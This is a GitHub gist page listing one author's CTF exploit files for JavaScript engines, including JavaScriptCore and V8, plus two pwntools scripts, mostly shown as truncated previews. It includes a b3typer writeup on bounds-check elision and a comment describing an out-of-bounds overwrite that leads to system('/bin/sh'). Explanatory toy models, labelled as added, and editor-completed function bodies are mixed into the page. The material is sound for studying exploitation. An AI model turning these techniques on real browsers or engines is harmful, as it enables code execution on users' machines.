🚩
Capturing flags

Anand Balaji d4rk-kn1gh7

@d4rk-kn1gh7
d4rk-kn1gh7 / writeup.md
Created January 22, 2023 10:27
bi0sCTF 2022 - b3typer

Short Writeup

  • Simple typer bug: the range of the BitAnd opcode is assumed to be [1, operand] when in reality it is [0, operand].
  • Use the wrong range assumption to create an unchecked integer underflow.
  • Bypass array bounds checks to obtain an OOB write, then overwrite the size of an array to get overlapping arrays.
  • Use the double-array / object-array overlap to build addrOf and fakeObj primitives.
  • Create an overlapping fake array using the StructureID leak to obtain arbitrary R/W.

The trick here is that the incorrect range turns a checked Add node into a plain Add node, which allows an unchecked integer underflow. Once the underflow check is gone, DFGIntegerRangeOptimization makes incorrect assumptions about bounds and subsequently removes bounds checks (more details in the comments of the exploit).
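To make the bounds-check elision concrete, here is an added toy range analysis (not code from the gist or from JavaScriptCore) run over the shape v = x & MASK; i = v + (-1); arr[i] with x unknown. The only thing toggled is the lower bound the BitAnd rule assumes: the sound value 0, or the assumed value 1 from the writeup. The array, mask and input value are constructed for the demo.

```javascript
// Added example, not the gist's exploit or JSC code: a toy integer-range
// analysis modelled on the b3typer bug.  Ranges are inclusive [lo, hi]
// over int32; ANY means "nothing known".
const INT_MIN = -2147483648;
const INT_MAX = 2147483647;
const ANY = [INT_MIN, INT_MAX];

// Range of x & m for a non-negative mask m: the true result is in [0, m].
// assumedLowerBound = 1 reproduces the bug (the reachable value 0 is excluded).
function rangeBitAnd(x, m, assumedLowerBound) {
  if (m[0] < 0) return ANY;                          // negative masks: no useful bound
  const hi = x[0] >= 0 ? Math.min(x[1], m[1]) : m[1];
  return [assumedLowerBound, hi];
}

// Range of a + b, and whether int32 overflow is still possible.
// A JIT keeps the checked Add only when mayOverflow is true.
function rangeAdd(a, b) {
  const lo = a[0] + b[0];
  const hi = a[1] + b[1];
  return {
    range: [Math.max(lo, INT_MIN), Math.min(hi, INT_MAX)],
    mayOverflow: lo < INT_MIN || hi > INT_MAX,
  };
}

// arr[idx] needs a bounds check unless idx is provably inside [0, length).
function boundsCheckNeeded(idxRange, length) {
  return !(idxRange[0] >= 0 && idxRange[1] < length);
}

// Analyse  v = x & mask;  i = v + (-1);  arr[i]  with x unknown.
function analyse(mask, length, assumedLowerBound) {
  const v = rangeBitAnd(ANY, [mask, mask], assumedLowerBound);
  const add = rangeAdd(v, [-1, -1]);
  return {
    vRange: v,
    iRange: add.range,
    addChecked: add.mayOverflow,                     // false: Add becomes unchecked
    boundsCheck: boundsCheckNeeded(add.range, length),
  };
}

// Execute the same shape concretely, honouring the analysis decisions.
function execute(x, mask, arr, decisions) {
  const v = x & mask;
  const i = (v + -1) | 0;
  const inBounds = i >= 0 && i < arr.length;
  if (decisions.boundsCheck && !inBounds) return "bounds check failed";
  if (!inBounds) return "unchecked access at index " + i;   // what the exploit abuses
  return arr[i];
}

// Constructed demo: 16-element array, mask 0xf, x = 16 so that x & 0xf is 0.
const SAMPLE = Array.from({ length: 16 }, (_, k) => 0x100 + k);

function demo() {
  const sound = analyse(0xf, SAMPLE.length, 0);   // i in [-1, 14]: check kept
  const buggy = analyse(0xf, SAMPLE.length, 1);   // i in [0, 14]: check dropped
  return {
    soundKeepsCheck: sound.boundsCheck,
    buggyDropsCheck: !buggy.boundsCheck,
    soundResult: execute(16, 0xf, SAMPLE, sound),
    buggyResult: execute(16, 0xf, SAMPLE, buggy),
  };
}
```

With the sound rule the index range is [-1, 14] and the check survives; with the assumed lower bound of 1 the range becomes [0, 14], the optimiser "proves" the access in bounds, and x = 16 then reaches index -1 with nothing left to stop it.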

@d4rk-kn1gh7
d4rk-kn1gh7 / exp.js
Created November 29, 2022 19:19
HITCON CTF 2022 - Fourchain Browser
let ab = new ArrayBuffer(8);
let f64a = new Float64Array(ab);
let u64a = new BigUint64Array(ab);
// Reinterpret the bits of a double as a 64-bit integer (BigInt, so no precision loss).
function f2i(v) {
    f64a[0] = v;
    return u64a[0];
}
// Reinterpret a 64-bit integer (BigInt) as a double.
function i2f(v) {
    u64a[0] = v;
    return f64a[0];
}
@d4rk-kn1gh7
d4rk-kn1gh7 / exp.js
Created October 16, 2022 03:46
ASIS Quals 2022 - jsy
/*
tl;dr:
Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
Use this to read addresses as strings, convert back to integers
Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
*/
function hex(x) {
    return "0x" + x.toString(16)
}
@d4rk-kn1gh7
d4rk-kn1gh7 / exp.py
Created December 12, 2021 09:04
SECCON - pyast64
def tmp():
new = 0x4eb9059
new = 0x4eb9054
new = 0x4eb905f
new = 0x4eb006a
new = 0x4eb905e
new = 0x4eb3b6a
new = 0x4eb9058
new = 0x4eb006a
@d4rk-kn1gh7
d4rk-kn1gh7 / exp.js
Created August 26, 2021 11:10
CoRCTF - outfoxed
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000
// Double -> integer via the two 32-bit halves (exact only for values below 2^53)
function f2i(f) {
    f64[0] = f
    return u32[0] + BASE*u32[1]
}
// Integer -> double, the inverse of f2i (body completed here; the gist preview is cut off)
function i2f(i) {
    u32[0] = i % BASE
    u32[1] = Math.floor(i / BASE)
    return f64[0]
}
@d4rk-kn1gh7
d4rk-kn1gh7 / exp.js
Created August 26, 2021 11:08
starCTF 2019 - oob-v8
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000
// Double -> integer via the two 32-bit halves (exact only for values below 2^53)
function f2i(f) {
    f64[0] = f
    return u32[0] + BASE*u32[1]
}
// Integer -> double, the inverse of f2i (body completed here; the gist preview is cut off)
function i2f(i) {
    u32[0] = i % BASE
    u32[1] = Math.floor(i / BASE)
    return f64[0]
}
@d4rk-kn1gh7
d4rk-kn1gh7 / exp.js
Created August 15, 2021 13:42
inCTFi 2021 - DeadlyFastGraph
// tl;dr : arbitrary type confusion by removing a CheckStructure node
// Full writeup coming soon :)
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000
// Double -> integer via the two 32-bit halves (exact only for values below 2^53)
function f2i(f) {
    f64[0] = f
    return u32[0] + BASE*u32[1]
}
@d4rk-kn1gh7
d4rk-kn1gh7 / exp1.js
Last active August 8, 2021 12:44
zh3r0 ctf - jsfordummies
/*
Bug: typecasting uint8_t* ab.backingStore to uint16_t* ta.mem while converting ArrayBuffer to Uint16Array,
but not reducing length, allows oob r/w.
Exploit: create ArrayBuffer of same size as JSObject, so that they come consecutively in memory,
use oob r/w to overwrite JSObject metadata, construct arbitrary r/w primitives, overwrite
Array constructor with system, JSState with "/bin/sh"
*/
test = new ArrayBuffer(0x70);
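The bug described in the comment above, as an added model (not code from the gist or from the jsfordummies engine): a flat Uint8Array stands in for the engine heap, an ArrayBuffer's 0x70-byte backing store is followed immediately by a JSObject, and the typed-array view keeps the byte count as its element count after the uint8_t* to uint16_t* reinterpretation. The JSObject layout (an 8-byte metadata word first) and the values written are assumptions made for the model.

```javascript
// Added example, not the gist's exploit or the challenge engine: a model of
// the "length not halved" typed-array bug and the adjacent-object overwrite
// it allows.
const AB_BYTES = 0x70;                          // size used in the writeup
const OBJ_BYTES = 0x70;                         // adjacent object of the same size
const heap = new Uint8Array(AB_BYTES + OBJ_BYTES);
const view = new DataView(heap.buffer);
const AB_OFF = 0;
const OBJ_OFF = AB_BYTES;                       // object starts right after the store

// Hypothetical JSObject layout for the model: the first 8 bytes are a
// pointer-sized metadata word.
function setObjMetadata(word) { view.setBigUint64(OBJ_OFF, word, true); }
function getObjMetadata() { return view.getBigUint64(OBJ_OFF, true); }

// Build a Uint16Array-like view over the backing store.  `buggy` reproduces
// the engine's mistake: ta.length = ab.length (bytes) instead of ab.length / 2.
function makeUint16View(storeOff, storeBytes, buggy) {
  const length = buggy ? storeBytes : Math.floor(storeBytes / 2);
  const check = (i) => {
    if (!Number.isInteger(i) || i < 0 || i >= length) {
      throw new RangeError("index " + i + " out of range");
    }
  };
  return {
    length,
    get(i) { check(i); return view.getUint16(storeOff + 2 * i, true); },
    set(i, v) { check(i); view.setUint16(storeOff + 2 * i, v, true); },
  };
}

// Write 0x4141 through the view at the first element past the backing store.
// With the buggy length the bounds check passes and the write lands on the
// neighbouring object's metadata; with the correct length it is rejected.
function overwriteNeighbour(buggy) {
  heap.fill(0);
  setObjMetadata(0x1122334455667788n);          // constructed metadata value
  const ta = makeUint16View(AB_OFF, AB_BYTES, buggy);
  const firstOobIndex = AB_BYTES / 2;           // 0x38 -> byte offset 0x70 = OBJ_OFF
  let outcome;
  try {
    ta.set(firstOobIndex, 0x4141);
    outcome = "written";
  } catch (e) {
    outcome = e instanceof RangeError ? "rejected" : "error";
  }
  return { length: ta.length, outcome, metadata: getObjMetadata() };
}
```

The fix is the one the comment implies: the element count must be the byte length divided by the element size, so the view's own bounds check stops at the end of the backing store. Everything after that in the writeup (rewriting JSObject metadata into arbitrary R/W) starts from exactly the overwrite modelled here.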
@d4rk-kn1gh7
d4rk-kn1gh7 / exp.py
Last active April 19, 2021 12:11
plaidctf - liars
#!/usr/bin/python
from pwn import *
import sys
import ctypes
from ctypes import *
remote_ip, port = 'liars.pwni.ng', 2018
binary = './liarmod'
brkpts = '''
'''
@d4rk-kn1gh7
d4rk-kn1gh7 / exp.py
Last active April 20, 2021 17:23
midnightsunquals - shapes
#!/usr/bin/python3
from pwn import *
import sys
remote_ip, port = 'shapes-01.play.midnightsunctf.se', 1111
binary = './chall'
brkpts = '''
'''